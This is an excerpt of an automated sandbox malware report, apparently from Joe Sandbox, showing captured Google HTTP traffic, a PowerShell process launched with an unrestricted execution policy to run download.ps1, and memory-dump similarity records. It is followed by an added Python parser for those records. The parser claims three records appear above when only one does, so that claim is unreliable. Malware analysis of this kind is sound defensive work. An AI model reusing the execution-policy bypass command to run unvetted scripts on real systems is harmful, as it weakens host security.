    Set-Cookie: NID=520=kP0ldbNiJE2hk-yxozgIPkbD-JOEuhK9XujbOrWiTWupVyEy07KjLtIYlq6jyQTm8MkmSe-xTaefY4PyvHh7dMfLRtY5zvQVB5Kj8v43b7In6Ozs8llvaUohgQ-pGzU9Xh5XYk3XpagtGkjOBnNazqLX6RVKH-heTO6dmO-UJaRNrqUa3RZuFSJvKhbql5UKqP7C-3MNeQ; expires=Tue, 08-Jul-2025 19:02:05 GMT; path=/; domain=.google.com; HttpOnly
    Accept-Ranges: none
    Vary: Accept-Encoding
    Transfer-Encoding: chunked
    Data Raw: 34 38 35 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c
    Data Ascii: 485e<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images,
Jan 6, 2025 20:02:06.031656981 CET | 224 | IN | Data Raw: 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79
    Data Ascii: videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type
Jan 6, 2025 20:02:06.031675100 CET | 1236 | IN | Data Raw: 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65
    Data Ascii: "><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="dOqGI8EeMr2eEXmd9UgJsw">(function(){var _g={kEI:'rSh8Z_yeKt_e1e8P_Jy8uQ0',kEXPI:'0,18167,184579,3497546,1092,30
Jan 6, 2025 20:02:06.031692982 CET | 1236 | IN | Data Raw: 30 2c 35 30 36 2c 32 35 36 2c 32 30 34 2c 31 31 35 2c 31 35 32 2c 33 36 32 2c 36 38 35 2c 32 2c 37 34 32 2c 32 2c 35 30 2c 36 33 2c 31 33 37 2c 35 30 2c 32 2c 34 37 37 2c 31 39 33 2c 36 31 2c 33 33 2c 31 30 39 2c 32 35 36 2c 33 34 36 2c 37 30 34
    Data Ascii: 0,506,256,204,115,152,362,685,2,742,2,50,63,137,50,2,477,193,61,33,109,256,346,704,94,362,63,140,2,288,339,139,119,222,1116,150,3,1060,101,1388,1021,14,92,2300,144,225,1951,21347207,37198,18,3484,866,3209,18,2010,48,154,554,1774,8,2065,3,1202,
Jan 6, 2025 20:02:06.031704903 CET | 1236 | IN | Data Raw: 67 6c 65 2e 67 65 74 45 49 3d 6e 3b 67 6f 6f 67 6c 65 2e 67 65 74 4c 45 49 3d 70 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28
    Data Ascii: gle.getEI=n;google.getLEI=p;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};goo
Jan 6, 2025 20:02:06.031716108 CET | 480 | IN | Data Raw: 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 61 3b 61 3a 7b 66 6f 72 28 61 3d 62 2e 74 61 72 67 65 74 3b 61 26 26 61 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74
    Data Ascii: stener("click",function(b){var a;a:{for(a=b.target;a&&a!==document.documentElement;a=a.parentElement)if(a.tagName==="A"){a=a.getAttribute("data-nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/
Jan 6, 2025 20:02:06.031945944 CET | 1236 | IN | Data Raw: 74 79 3a 68 69 64 64 65 6e 3b 7a 2d 69 6e 64 65 78 3a 39 39 38 3b 72 69 67 68 74 3a 30 7d 2e 67 62 74 6f 20 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 7d 23 67 62 78 33 2c 23 67 62 78 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f
    Data Ascii: ty:hidden;z-index:998;right:0}.gbto #gbs{background:#fff}#gbx3,#gbx4{background-color:#2d2d2d;background-image:none;_background-image:none;background-position:0 -138px;background-repeat:repeat-x;border-bottom:1px solid #000;font-size:24px;heig
Jan 6, 2025 20:02:06.031959057 CET | 1236 | IN | Data Raw: 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c
    Data Ascii: *left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacity:1\0/;top:-4px\0/;left:-6px\0/;right:5px\0/;bottom:4px\0/}.gbma{position:relative;top:-1px;border-style:solid dashed dashed;border-colo
Jan 6, 2025 20:02:06.031974077 CET | 1236 | IN | Data Raw: 63 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 70 78 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74
    Data Ascii: c;padding-bottom:1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .
Jan 6, 2025 20:02:06.031989098 CET | 1236 | IN | Data Raw: 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 34 34 70 78 20 2d 31 30 31 70 78 7d 23 67 62 6d 70 69 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 30 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 7b 62 6f 72 64 65 72 3a 6e 6f 6e
    Data Ascii: nd-position:-44px -101px}#gbmpid{background-position:0 0}#gbmpi,#gbmpid{border:none;display:inline-block;height:48px;width:48px}#gbmpiw{display:inline-block;line-height:9px;padding-left:20px;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gb
Jan 6, 2025 20:02:06.036590099 CET | 1236 | IN | Data Raw: 65 64 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 7d 2e 67 62 6d 6c 62 2d 68 76 72 2c 2e 67 62 6d 6c 62 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65
    Data Ascii: ed{line-height:27px}.gbmlb-hvr,.gbmlb:focus{outline:none;text-decoration:underline !important}.gbmlbw{color:#ccc;margin:0 10px}.gbmt{padding:0 20px}.gbmt:hover,.gbmt:focus{background:#eee;cursor:pointer;outline:0 solid black;text-decoration:no


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

Target ID: 0
Start time: 14:01:55
Start date: 06/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 14:01:55
Start date: 06/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2193027592.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: N_^$N_^$N_^$N_^
                                                                                                      • API String ID: 0-3900292545
                                                                                                      • Opcode ID: 5cce2b6a3058e4e480e11fd19eadab8f3814c94e6f73f072fa8dc97af64999d4
                                                                                                      • Instruction ID: 1c00ba4253ae0f5c14ca5650501dd0588cf114807eca6f5a55c3c80bd340544f
                                                                                                      • Opcode Fuzzy Hash: 5cce2b6a3058e4e480e11fd19eadab8f3814c94e6f73f072fa8dc97af64999d4
                                                                                                      • Instruction Fuzzy Hash: 2521A7B2D0EAD38FE35AD72858990557FA0FF11398F6900FFC08D9A093FA7668078605
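Added here as a worked example, not part of the Joe Sandbox report: a small Python parser for the function records above. It turns each repeated "Memory Dump Source / Similarity" block into a dict, decodes the Source File line (dump name, load offset, whether the dump maps onto a PE image), and groups functions by the string set they reference so that functions sharing an API String ID can be reviewed together. The sample text is the three records shown above; the assumption that '$' separates multiple strings in the String ID field is mine, not stated by the report.

```python
import re
from collections import defaultdict

# The three records from the report excerpt above, with the extraction
# indentation removed. This is the page's own data, not constructed input.
REPORT_EXCERPT = """\
Strings
Memory Dump Source
• Source File: 00000000.00000002.2193027592.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848e60000_powershell.jbxd
Similarity
• API ID:
• String ID: I
• API String ID: 0-3707901625
• Opcode ID: e1c3921fb4ac62349e71704a53c8847c882e3be4db40f3704e1e6a348ed1f86a
• Instruction ID: 0fc1af73bd408cd381b9996eb7642ec67d13068c6908f2b33b1f180dfb584334
• Opcode Fuzzy Hash: e1c3921fb4ac62349e71704a53c8847c882e3be4db40f3704e1e6a348ed1f86a
• Instruction Fuzzy Hash: 7C520532A0DAD64FE756EB2C98555E97FA0FF52394F5800B6C04CEB083DF29B8468794
Strings
Memory Dump Source
• Source File: 00000000.00000002.2193027592.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848e60000_powershell.jbxd
Similarity
• API ID:
• String ID: I
• API String ID: 0-3707901625
• Opcode ID: 7edae96486b573a9812ca154dba49558ccff75ff1d60012456ac20f8c5894b2c
• Instruction ID: 4f8af7480bae75f119bcb4025bc5b15d2249c553da23299703f3e6e37985e91f
• Opcode Fuzzy Hash: 7edae96486b573a9812ca154dba49558ccff75ff1d60012456ac20f8c5894b2c
• Instruction Fuzzy Hash: 5942946690DBD25FE357AB786C650E53FA0FF537A5B0900FBD184CB0A3EA185C0A8365
Strings
Memory Dump Source
• Source File: 00000000.00000002.2193027592.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff848e60000_powershell.jbxd
Similarity
• API ID:
• String ID: N_^$N_^$N_^$N_^
• API String ID: 0-3900292545
• Opcode ID: 5cce2b6a3058e4e480e11fd19eadab8f3814c94e6f73f072fa8dc97af64999d4
• Instruction ID: 1c00ba4253ae0f5c14ca5650501dd0588cf114807eca6f5a55c3c80bd340544f
• Opcode Fuzzy Hash: 5cce2b6a3058e4e480e11fd19eadab8f3814c94e6f73f072fa8dc97af64999d4
• Instruction Fuzzy Hash: 2521A7B2D0EAD38FE35AD72858990557FA0FF11398F6900FFC08D9A093FA7668078605
"""

# A field line is an optional bullet, a key without colons, a colon, and the value.
FIELD_RE = re.compile(r"^[•*-]?\s*([A-Za-z ]+):\s*(.*)$")
# The Source File value carries three sub-fields: dump name, hex offset, PE flag.
SOURCE_RE = re.compile(
    r"^(?P<file>[^,\s]+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)$"
)


def parse_records(text):
    """One dict per function record. A record starts at each 'Memory Dump Source'
    header; every bullet line until the next header becomes a key/value field."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {}
            records.append(current)
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            current[m.group(1).strip()] = m.group(2).strip()
    return records


def source_info(record):
    """Decode the Source File field: dump name, integer load offset, and whether
    Joe Sandbox could map the dump onto a PE image (false = not backed by a file on disk)."""
    m = SOURCE_RE.match(record["Source File"])
    if not m:
        raise ValueError("unrecognised Source File line: " + record["Source File"])
    return {"file": m["file"], "offset": int(m["offset"], 16), "based_on_pe": m["pe"] == "true"}


def strings_of(record):
    """Strings referenced by the function. Assumption: several strings are joined with '$'."""
    sid = record.get("String ID", "")
    return sid.split("$") if sid else []


def opcode_ids_by_string_set(records):
    """Map each API String ID to the Opcode IDs (functions) that reference that string set."""
    groups = defaultdict(list)
    for r in records:
        groups[r["API String ID"]].append(r["Opcode ID"])
    return dict(groups)


def shared_string_sets(records):
    """API String IDs referenced by more than one distinct function: candidates to open
    side by side in the disassembler, since they touch the same strings with different code."""
    return sorted(k for k, v in opcode_ids_by_string_set(records).items() if len(set(v)) > 1)


def fuzzy_hash_mismatches(records):
    """In these records the Opcode Fuzzy Hash repeats the Opcode ID; return any that differ."""
    return [r["Opcode ID"] for r in records if r["Opcode ID"] != r["Opcode Fuzzy Hash"]]


if __name__ == "__main__":
    recs = parse_records(REPORT_EXCERPT)
    info = source_info(recs[0])
    print(len(recs), "records from", info["file"], "at", hex(info["offset"]))
    for sid in shared_string_sets(recs):
        print("string set", sid, "shared by", opcode_ids_by_string_set(recs)[sid])
```

Run against the full report text rather than the excerpt and the grouping becomes a quick way to find which of the hundreds of dumped PowerShell functions actually share string references; the two records with API String ID 0-3707901625 above are such a pair.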